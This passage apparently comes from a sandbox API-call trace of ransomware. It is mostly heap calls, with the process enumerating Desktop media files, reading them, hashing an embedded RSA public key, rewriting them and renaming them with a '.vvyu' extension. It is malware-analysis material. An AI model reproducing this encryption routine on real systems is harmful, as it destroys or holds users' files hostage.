hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0199.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0199.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.065] GetCurrentThreadId () returned 0x5d8 [0199.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af58d0 [0199.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.065] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.065] GetCurrentThreadId () returned 0x5d8 [0199.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.066] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.067] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69f8 [0199.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0199.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a10 [0199.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69e0 [0199.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a70 [0199.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0199.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a28 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a88 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a28 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a40 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae69f8 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.069] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69f8 | out: hHeap=0x2c0000) returned 1 [0199.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.070] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.070] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.072] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a28 | out: hHeap=0x2c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a10 | out: hHeap=0x2c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69e0 | out: hHeap=0x2c0000) returned 1 [0199.073] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae69c8 | out: hHeap=0x2c0000) returned 1 [0199.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade740 | out: hHeap=0x2c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.075] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40478 | out: hHeap=0x2c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0199.076] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.077] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.077] WriteFile (in: hFile=0x584, lpBuffer=0x2af7168*, nNumberOfBytesToWrite=0x9653, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af7168*, lpNumberOfBytesWritten=0x2f9fb14*=0x9653, lpOverlapped=0x0) returned 1 [0199.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af7168 | out: hHeap=0x2c0000) returned 1 [0199.078] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x9658, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.078] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.078] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0199.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0199.078] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e0 [0199.079] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.079] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0199.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e0 | out: hHeap=0x2c0000) returned 1 [0199.079] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0199.079] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.080] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.080] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.080] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.080] CloseHandle (hObject=0x584) returned 1 [0199.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x29add10 [0199.081] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x2af3f88 [0199.082] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29add10 | out: hHeap=0x2c0000) returned 1 [0199.082] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\AdIa hVz87JStJ8m.flv" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\adia hvz87jstj8m.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\AdIa hVz87JStJ8m.flv.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\adia hvz87jstj8m.flv.vvyu")) returned 1 [0199.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.084] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a245f0 | out: hHeap=0x2c0000) returned 1 [0199.086] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xed078130, ftCreationTime.dwHighDateTime=0x1d89913, ftLastAccessTime.dwLowDateTime=0x9b8c2950, ftLastAccessTime.dwHighDateTime=0x1d8a0f7, ftLastWriteTime.dwLowDateTime=0x9b8c2950, ftLastWriteTime.dwHighDateTime=0x1d8a0f7, nFileSizeHigh=0x0, nFileSizeLow=0x18bc3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cuoL988XNBLbr.m4a", cAlternateFileName="CUOL98~1.M4A")) returned 1 [0199.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b6c8 [0199.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbe) returned 0x2a245f0 [0199.087] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b6c8 | out: hHeap=0x2c0000) returned 1 [0199.087] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\cuoL988XNBLbr.m4a") returned=".m4a" [0199.087] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\YnPBSI277\\5Ctq03jfOkJI397\\f6AdJjDhQ\\cuoL988XNBLbr.m4a" (normalized: "c:\\users\\keecfmwgj\\desktop\\ynpbsi277\\5ctq03jfokji397\\f6adjjdhq\\cuol988xnblbr.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.088] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=101315) returned 1 [0199.088] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.091] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18b9d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.091] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.094] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.094] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.094] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x18bc3, lpOverlapped=0x0) returned 1 [0199.095] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.095] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.095] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.095] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b6c8) returned 1 [0199.096] CryptCreateHash (in: hProv=0x31b6c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.096] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.096] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.097] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.097] GetLastError () returned 0x0 [0199.097] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.097] CryptReleaseContext (hProv=0x31b6c8, dwFlags=0x0) returned 1 [0199.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.097] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.097] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.097] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.097] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18bc0) returned 0x2af7168 [0199.098] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade740 [0199.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae69c8 [0199.099] RtlAllocateHeap 